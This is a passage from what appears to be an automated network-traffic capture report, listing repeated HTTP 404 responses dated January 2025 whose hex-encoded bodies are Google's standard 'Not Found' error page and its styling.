74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:17:36 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:17:38 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:17:40 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:17:43 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:17:45 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:17:47 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 